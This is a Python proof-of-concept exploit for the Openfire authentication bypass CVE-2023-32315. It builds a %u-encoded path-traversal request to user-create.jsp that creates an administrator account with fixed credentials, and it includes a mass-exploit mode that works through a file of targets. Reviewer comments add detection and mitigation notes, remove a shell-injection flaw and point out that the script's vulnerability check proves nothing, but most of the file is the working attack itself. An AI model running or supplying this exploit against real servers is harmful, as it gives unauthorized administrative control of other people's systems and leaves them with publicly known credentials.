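#!/bin/python3
"""Proof of concept for CVE-2023-32315 (Openfire authentication bypass).

The script reads the ``csrf`` cookie from ``/login.jsp`` and then requests
``user-create.jsp`` through a ``/setup/setup-s/`` path whose ``%u002e%u002e``
segments are %u-encoded ``..``, asking the server to create an admin user.

Notes for defenders reviewing this PoC:

* Detection: access-log entries under ``/setup/setup-s/`` that contain
  ``%u002e`` and end in ``user-create.jsp``, and unexpected admin accounts.
  This script always uses the fixed username ``hugme``.
* Mitigation: upgrade Openfire to a release that fixes CVE-2023-32315 and
  keep the admin console unreachable from untrusted networks.
"""
import argparse
import subprocess
import requests
from rich.console import Console

color = Console()


def ascii_art():
    """Print the banner and author credit."""
    print("")
    color.print("[yellow] ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██ ███████[/yellow]")
    color.print("[yellow]██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ███ ██ [/yellow]")
    color.print("[yellow]██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ █████ █████ █████ ██ ███████[/yellow]")
    color.print("[yellow]██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██[/yellow]")
    color.print("[yellow] ██████ ████ ███████ ███████ ██████ ███████ ██████ ██████ ███████ ██████ ██ ███████[/yellow]")
    print("")
    print("Coded By: K3ysTr0K3R --> Hug me ʕっ•ᴥ•ʔっ")
    print("")


def get_csrf_token(target_url):
    """Return the ``csrf`` cookie set by ``<target_url>/login.jsp``.

    Returns None when the request fails or the cookie is absent. The value is
    chosen by the remote server and must be treated as untrusted input.
    """
    try:
        # NOTE(review): no timeout is set, so an unresponsive host blocks here.
        response = requests.head(target_url + "/login.jsp")
        cookies = response.cookies.get_dict()
        csrf_token = cookies.get('csrf')
        return csrf_token
    except requests.RequestException:
        return None


def add_credentials(target_url, csrf_token, username, password):
    """Request creation of an admin user on the target and report the result.

    Args:
        target_url: Base URL of the Openfire admin console.
        csrf_token: Value of the ``csrf`` cookie (server-supplied, untrusted).
        username: Name of the account to create.
        password: Password of the account to create.
    """
    color.print(f"[blue][*][/blue] Launching exploit against: [yellow]{target_url}[/yellow]")
    vuln_path = f'/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={csrf_token}&username={username}&password={password}&passwordConfirm={password}&isadmin=on&create=Create%2bUser'
    headers = {
        "Accept-Encoding": "gzip, deflate",
        "Accept": "*/*",
        "Accept-Language": "en-US;q=0.9,en;q=0.8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",
        "Connection": "close",
        "Cache-Control": "max-age=0",
        "Cookie": f"csrf={csrf_token}"
    }
    color.print("[blue][*][/blue] Checking if the target is vulnerable")
    # NOTE(review): this only fetches the base URL and tests for HTTP 200; it
    # never touches the vulnerable path, so the "Target is vulnerable" message
    # below is not evidence that the host is affected.
    # verify=False disables TLS certificate validation for this request only;
    # the HEAD request in get_csrf_token uses the default verification.
    check_vuln = requests.get(target_url, headers=headers, verify=False).status_code
    if check_vuln == 200:
        color.print("[green][+][/green] Target is vulnerable")
        color.print("[blue][*][/blue] Adding credentials")
        # The original assembled one shell string and ran it with shell=True.
        # target_url comes from the CLI or the target file and csrf_token from
        # the remote server's cookie, so a crafted value could break out of
        # the quoting and run commands on the machine running this script.
        # Passing an argument vector without a shell removes that injection
        # point while sending the same request with the same headers.
        curl_argv = ["curl", "-I", "-X", "GET", f"{target_url}{vuln_path}"]
        for header_name, header_value in headers.items():
            curl_argv += ["-H", f"{header_name}: {header_value}"]
        try:
            completed = subprocess.run(curl_argv, capture_output=True, check=False)
        except OSError:
            # curl is missing or not executable; the shell-based original
            # ended up on the failure branch in that case as well.
            color.print("[red][~][/red] Failed to add credentials")
            return
        output = completed.stdout
        # NOTE(review): substring match on the raw header dump; any "200" in
        # any header (for example a length or a date) counts as success.
        if "200" in str(output):
            color.print("[green][+][/green] Successfully added, here are the credentials")
            color.print(f"[green][+][/green] Username: [green]{username}[/green]")
            color.print(f"[green][+][/green] Password: [green]{password}[/green]")
        else:
            # The original markup never closed the [red] tag.
            color.print("[red][~][/red] Failed to add credentials")


def exploit(target_url):
    """Run the PoC against a single target URL."""
    # NOTE(review): fixed, publicly known credentials. Any host this succeeds
    # against is left with an admin account that anyone who has read this
    # script can log in to; remove the account after testing.
    username = "hugme"
    password = "HugmeNOW"
    try:
        csrf_token = get_csrf_token(target_url)
        if csrf_token:
            add_credentials(target_url, csrf_token, username, password)
        else:
            color.print("[red][~][/red] CSRF token not found in headers. Vulnerability may not exist.")
    except requests.RequestException as err:
        # Previously swallowed silently; report why the run stopped.
        color.print(f"[red][~][/red] Request failed: {err}")


def mass_exploit(target_url, target_file):
    """Run the PoC against every URL listed in ``target_file``, one per line.

    ``target_url`` is accepted for interface compatibility; its incoming value
    is ignored and replaced by each line read from the file.
    """
    username = "hugme"
    password = "HugmeNOW"
    try:
        with open(target_file, 'r') as targ:
            for targs in targ:
                target_url = targs.strip()
                csrf_token = get_csrf_token(target_url)
                if csrf_token:
                    add_credentials(target_url, csrf_token, username, password)
    except FileNotFoundError:
        color.print(f"[red][~][/red] Target file not found: {target_file}")
    except Exception as err:
        # As in the original, the first unexpected error ends the whole run;
        # it is now reported instead of being dropped.
        color.print(f"[red][~][/red] Stopped: {err}")


def main():
    """Parse the command line and dispatch to single- or multi-target mode."""
    ascii_art()
    parser = argparse.ArgumentParser(description='A PoC for CVE-2023-32315 - Openfire Authentication Bypass')
    parser.add_argument('-u', '--url', help='Target to exploit')
    parser.add_argument('-f', '--file', help='File containing targets to exploit')
    args = parser.parse_args()
    # --url takes precedence; --file is only used when --url is absent.
    if args.url:
        exploit(args.url)
    elif args.file:
        mass_exploit(args.url, args.file)


if __name__ == "__main__":
    main()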